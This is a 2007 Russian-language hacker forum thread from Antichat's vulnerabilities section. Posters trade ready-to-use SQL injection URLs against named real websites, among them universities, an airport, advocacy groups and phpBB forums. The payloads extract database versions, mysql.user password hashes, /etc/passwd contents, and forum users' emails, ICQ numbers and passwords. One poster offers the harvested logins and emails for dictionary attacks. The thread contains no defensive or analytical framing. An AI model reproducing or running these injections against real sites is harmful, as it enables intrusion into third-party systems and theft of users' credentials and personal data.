ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #531  
Старый 17.02.2007, 03:36
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Код:
__http://www.franinfo.co.uk/exhi_detail.php?id=-18'+union+select+1,user(),3,4,5,6,7,8,9/*&exhibitionId=54
__http://www.teachers.org.uk/topichome.php?id=-143'+union+select+1,convert(version()+using+latin1),333,444,555,6,7,8,9/*
 
Ответить с цитированием

  #532  
Старый 17.02.2007, 23:17
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.rosmarket.ru/index.php?r_id=-1+union+select+user()/*

http://www.aldenvet.kiev.ua/news/viewnews.php?kley=-1+union+select+1,database(),version(),user(),5,6,7/*

ППЦ http://vrn.kips.ru/

Последний раз редактировалось *D1VER; 18.02.2007 в 00:36..
 
Ответить с цитированием

  #533  
Старый 18.02.2007, 00:44
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Код:
http://ccrc.tc.columbia.edu/Publication.asp?UID=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('ContentItem','ContentItem_Person','Archive','Archive_Pass','ArchiveColumn','ArchiveColumn_ValidationScheme',%20'Area','Category','Category_Client','Category_Record','CCRCRole','Client_Category','Conference','ContentGroup','ContentItem_ContentItemDesc','ContentItemDesc','ContentItemType','cw_Client','cw_Client_Card','cw_client_newsletter','cw_client_newsletter_old','cw_Client_Pass','cw_Client_RecordPass','cw_CreditTrans','cw_NewslettersSent','cw_Pass','cw_RecordRelate','cw_Session','DiscussionPost','DiscussionTopic','DiscussionTopic_Record','dtproperties','EditionList','Event','Fact','Import','Link','Main','NB_Commander_Tmp',%20'NewsletterFormat','OrgType','Person','PluginRecord','Presentation','Presentation_Conference','Presentation_ContentItem','Presentation_Person','Record_Pass','RecordSecurity','ResearchProject',%20'ResearchProject_Person','Search','Seminar','Seminar_ContentItem','Seminar_Person','sysconstraints','syssegments','ValidationScheme'))--
Цитата:
http://www.pixiport.com/auction/profile.php?user_id=-6%20UNION%20SELECT%200,1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22/*
Цитата:
http://www.touchware.cz/view.php?uid=24&where=Software&id=-79%20union%20select%201,2,3,4,5,6,7,8,9,0/*
Цитата:
http://outcomes.web.arizona.edu/data.php?uid=-3%20UNION%20SELECT%200,1,2,3,4%20from%20informatio n_schema.tables/*
Цитата:
http://www.studieguide.sdu.dk/studier/index.php?uid=-92%20UNION%20SELECT%200,1,2,3,name,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20%20from%20groups%20wher e%20id=1/*
Цитата:
http://www.uovs.ac.za/content.php?cid=1&uid=-430%20UNION%20SELECT%200,1,2,concat(user,char(58), password),4,5,6,7%20from%20mysql.user/*
Цитата:
http://www.voyage-luxe.ru/chapter3.html?uid=3&uptr=&news_id=-2185%20UNION%20SELECT%200,concat(user,char(58),pas sword),2,3%20from%20mysql.user/*
Цитата:
http://ran.org/media_center/news_article/?uid=-2229%20UNION%20SELECT%200,1,user,3,4,5,6,7,8,9,pas sword,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4 2%20from%20mysql.user/*
Цитата:
http://www.guiaoleo.com.ar/user_details.php?user_id=-5%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,username,password,23,24,25,26 ,27,28,29,30,31,32%20from%20users/*
 
Ответить с цитированием

  #534  
Старый 18.02.2007, 00:45
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.caduser.ru/acad/index.php?ver_id=-1+union+select+1,load_file('/etc/passwd'),3,4+from+mysql.user/*
 
Ответить с цитированием

  #535  
Старый 18.02.2007, 02:55
Аватар для pop_korn
pop_korn
Участник форума
Регистрация: 13.09.2005
Сообщений: 170
Провел на форуме:
483324

Репутация: 92
По умолчанию

_http://www.latek.com.ua/index.php?page=produkt.php&subcat=-51+UNION+SELECT+1,2,3,pas,5,log,7,8+from+user/*
 
Ответить с цитированием

  #536  
Старый 18.02.2007, 12:40
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.vera-nn.ru/credit.php?id=-1+union+select+version()
5.0.21-max =\
 
Ответить с цитированием

  #537  
Старый 18.02.2007, 15:21
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Пройдемся по форумам

Цитата:
http://www.dog-handling.com/forum/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.wsv-verden-jugend.de/forum/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.a1k.it/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users%20where%20user_id<1000/*
Если там ограничение по юзерам не задовать, то ошибку выдает

Цитата:
http://www.frodo-beutlin.de/phpbb/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.inbs-club.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.lemondedescroisieres.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://forum2002.maghrebonline.nl/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.saloua.nl/vrouwen/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://www.zauberschrank-forum.de/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9%20f rom%20phpbb_users/*
Цитата:
http://members.lycos.co.uk/police100/downloads.php?cat=-1%20union%20select%201,user_id,concat(user_email,c har(58),user_icq,char(58),user_password),4,5,6,7,8 ,9%20from%20phpbb_users/*
В среднем, на каждом сайте 1500 юзеров.
 
Ответить с цитированием

  #538  
Старый 18.02.2007, 18:01
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Cologne Bonn Airport

_http://www.cgn.de/main.php?lang=2&id=45+union+select+1,2,3,LOAD_FILE (char(47,101,116,99,47,112,97,115,115,119,100)),5, 6,database(),8,9,0,1,2,3,user(),5,6,7/*
 
Ответить с цитированием

  #539  
Старый 19.02.2007, 03:16
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Код:
__http://www.ihrc.org.uk/show.php?id=-1657+union+select+1,2,user(),database(),version(),6,7,8,9,10,11,12,13/*
с этих не смог ничего вывести

Код:
__http://www.fairelections.us/article.php?id=-67+union+select+1,2,3,4,5/*
__http://www.elkhart.k12.in.us/content.php?id=157+union+select+1,2,3,4,555/*

Последний раз редактировалось Thanat0z; 19.02.2007 в 04:20..
 
Ответить с цитированием

  #540  
Старый 19.02.2007, 05:08
Аватар для Thanat0z
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
Провел на форуме:
5352530

Репутация: 2062


По умолчанию

Цитата:
__http://forum.skeye.com/downloads.php?cat=-1%20union%20select%201,2,concat(user_email,char(58 ),user_icq,char(58),user_password),4,5,6,7,8,9,10% 20from%20phpbb_users/*
ЗЫ после вырежу мыльники и логины для словарей, кому надо, то пишите в личку

Последний раз редактировалось Thanat0z; 19.02.2007 в 07:13..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ